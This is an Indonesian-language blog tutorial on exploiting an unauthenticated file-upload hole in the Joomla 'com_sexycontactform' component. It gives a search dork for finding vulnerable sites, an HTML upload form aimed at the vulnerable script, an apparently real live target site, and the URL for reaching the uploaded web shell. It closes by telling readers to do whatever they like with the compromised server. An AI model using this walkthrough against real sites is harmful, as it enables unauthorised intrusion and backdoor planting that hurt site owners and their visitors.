1. PC tentunya
2. script CSRF
<form method="POST" action="http://target.com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
3. Shell Backdoor
4. Dork inurl:/components/com_sexycontactform/
5. Exploit : components/com_sexycontactform/fileupload/index.php
contoh :
live target :
http://www.brinworks.com.ar/components/com_sexycontactform/fileupload/index.php
SS :
 |
| http://blog.incef-team.com |
setelah itu kita copy link dari target tersebut ke script CSRF tadi !
jadi seperti ini
<form method="POST" action="http://www.brinworks.com.ar/components/com_sexycontactform/fileupload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>
klw udah sekarang kita buka script CSRF nya , jadinya kek gini
setelah berhasil upload shell,
kita panggil shellnya
http://www.target.com/components/com_sexycontactform/fileupload/files/shell.php
jadi begini : http://www.brinworks.com.ar/components/com_sexycontactform/fileupload/files/shell.php
klw shell udah ke upload, terserah deh mau diapain ^_^
kalau masih kurang jelas, bisa nonton videonya di SINI !
sekian dari saya ^_^ semoga bermanfaat
Tidak ada komentar:
Posting Komentar